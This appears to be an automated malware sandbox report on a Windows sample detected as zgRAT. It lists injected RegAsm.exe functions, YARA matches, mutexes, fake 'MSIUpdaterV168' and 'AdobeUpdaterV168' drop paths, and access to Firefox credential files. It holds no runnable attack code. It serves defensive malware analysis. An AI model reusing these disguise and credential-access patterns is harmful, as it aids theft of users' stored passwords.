Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004A3610	20_2_004A3610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_005486C0	20_2_005486C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00547760	20_2_00547760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004F7730	20_2_004F7730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004E77E0	20_2_004E77E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_005397B0	20_2_005397B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004547BF	20_2_004547BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004F2820	20_2_004F2820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0043C960	20_2_0043C960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00546970	20_2_00546970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004F7960	20_2_004F7960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0043A928	20_2_0043A928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004EF9A0	20_2_004EF9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0043AAEF	20_2_0043AAEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0044DA86	20_2_0044DA86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004F8B40	20_2_004F8B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00493B60	20_2_00493B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0051DBB0	20_2_0051DBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00500BA0	20_2_00500BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00458BB0	20_2_00458BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004EFC40	20_2_004EFC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004EEC40	20_2_004EEC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004F7C00	20_2_004F7C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00503CC0	20_2_00503CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00409C90	20_2_00409C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00534D40	20_2_00534D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004F9D70	20_2_004F9D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004F7D00	20_2_004F7D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004FAD00	20_2_004FAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00546D20	20_2_00546D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00545DE0	20_2_00545DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0053AE20	20_2_0053AE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00458E30	20_2_00458E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00506EA0	20_2_00506EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00516EA0	20_2_00516EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004DFF00	20_2_004DFF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00541F00	20_2_00541F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004F2FD0	20_2_004F2FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00501FE0	20_2_00501FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004FFFA0	20_2_004FFFA0
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E57930	22_2_00E57930
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E43050	22_2_00E43050
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E3F934	22_2_00E3F934
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E5123B	22_2_00E5123B
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E34430	22_2_00E34430
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E46DB9	22_2_00E46DB9
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E477D9	22_2_00E477D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE94CF0	24_2_1FE94CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE8209F	24_2_1FE8209F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FFE9CC0	24_2_1FFE9CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE847AF	24_2_1FE847AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FFA9A20	24_2_1FFA9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF35940	24_2_1FF35940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE83E3B	24_2_1FE83E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE8481D	24_2_1FE8481D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF3D6D0	24_2_1FF3D6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF29690	24_2_1FF29690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FFE9430	24_2_1FFE9430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF153B0	24_2_1FF153B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE819DD	24_2_1FE819DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_2005AEBE	24_2_2005AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FFA5040	24_2_1FFA5040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE99000	24_2_1FE99000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE8174E	24_2_1FE8174E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEA8D2A	24_2_1FEA8D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF84A60	24_2_1FF84A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEA8763	24_2_1FEA8763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEE4760	24_2_1FEE4760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF18760	24_2_1FF18760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEA8680	24_2_1FEA8680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE8251D	24_2_1FE8251D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FFC0480	24_2_1FFC0480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE8290A	24_2_1FE8290A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF08120	24_2_1FF08120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF00090	24_2_1FF00090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FFA8030	24_2_1FFA8030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE83AB2	24_2_1FE83AB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEABAB0	24_2_1FEABAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE81EF1	24_2_1FE81EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEB3370	24_2_1FEB3370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE8F160	24_2_1FE8F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEE2EE0	24_2_1FEE2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEC6E80	24_2_1FEC6E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_2005D209	24_2_2005D209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE83580	24_2_1FE83580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE8EA80	24_2_1FE8EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE8AA40	24_2_1FE8AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF669C0	24_2_1FF669C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF7A940	24_2_1FF7A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF9A900	24_2_1FF9A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FFBE800	24_2_1FFBE800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE81C9E	24_2_1FE81C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE966C0	24_2_1FE966C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE82018	24_2_1FE82018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF7A590	24_2_1FF7A590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEAA560	24_2_1FEAA560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE8292D	24_2_1FE8292D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF0A0B0	24_2_1FF0A0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE82AA9	24_2_1FE82AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE812A8	24_2_1FE812A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0041E919	24_2_0041E919
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0041ECEC	24_2_0041ECEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0041EEC1	24_2_0041EEC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0041F6CF	24_2_0041F6CF
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C74920	32_2_00C74920
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C6E8C8	32_2_00C6E8C8
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C64869	32_2_00C64869
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C65289	32_2_00C65289
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C5DAB4	32_2_00C5DAB4
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C60B00	32_2_00C60B00
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C53D50	32_2_00C53D50

Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: String function: 00E39B60 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: String function: 006D7EF0 appears 50 times
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: String function: 00C57EF0 appears 50 times
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: String function: 00327EF0 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00547510 appears 91 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1FE81C2B appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1FE8415B appears 133 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1FE81F5A appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041ACE0 appears 49 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1FE83AF3 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1FE8395E appears 78 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 200606B1 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00434380 appears 52 times
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: String function: 00127EF0 appears 50 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7548 -ip 7548

Source: zyJWi2vy29.exe, 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenamedotnet.exe6 vs zyJWi2vy29.exe

Source: zyJWi2vy29.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 46.0.MSIUpdaterV168.exe.f50000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: Process Memory Space: 8x9h3ctqkpfTu0sNF0X2.exe PID: 7268, type: MEMORYSTR	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: MSIUpdaterV168.exe PID: 2504, type: MEMORYSTR	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: MSIUpdaterV168.exe PID: 7744, type: MEMORYSTR	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: zyJWi2vy29.exe	Static PE information: Section: .data ZLIB complexity 0.9979742906085476
Source: rise2806[1].exe.3.dr	Static PE information: Section: .data ZLIB complexity 0.9979742906085476
Source: 6p7a7injLZJojhETBNhL.exe.3.dr	Static PE information: Section: .data ZLIB complexity 0.9979742906085476
Source: AdobeUpdaterV168.exe0.3.dr	Static PE information: Section: .data ZLIB complexity 0.9979742906085476
Source: MSIUpdaterV168.exe0.3.dr	Static PE information: Section: .data ZLIB complexity 0.9979742906085476

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@80/66@4/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 20_2_00545050 GetLastError,GetVersionExA,FormatMessageW,LocalFree,FormatMessageA,

20_2_00545050

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 20_2_00544A40 GetDiskFreeSpaceW,GetDiskFreeSpaceA,

20_2_00544A40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 20_2_0048F070 CreateDirectoryA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

20_2_0048F070

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2840:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8004
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:7632:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7268
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7548
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7632

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\trixy3qyfLZqnmIGj

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\zyJWi2vy29.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: zyJWi2vy29.exe, 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmp, 6p7a7injLZJojhETBNhL.exe, 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmp, MSIUpdaterV168.exe, 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmp, MSIUpdaterV168.exe, 0000000E.00000002.1980283521.0000000000150000.00000004.00000001.01000000.00000007.sdmp, RegAsm.exe, RegAsm.exe, 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000018.00000002.2948532623.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.24.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000018.00000002.2948532623.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.24.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.2948532623.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.24.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: zyJWi2vy29.exe, 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmp, 6p7a7injLZJojhETBNhL.exe, 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmp, MSIUpdaterV168.exe, 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmp, MSIUpdaterV168.exe, 0000000E.00000002.1980283521.0000000000150000.00000004.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000018.00000002.2948532623.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.24.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.2948532623.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.24.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000003.00000002.1990536151.0000000005746000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT url FROM moz_places WHERE (`id` = 7)`,;
Source: RegAsm.exe, 00000018.00000002.2948532623.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.24.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000018.00000002.2948532623.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.24.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000018.00000002.2948532623.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.24.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
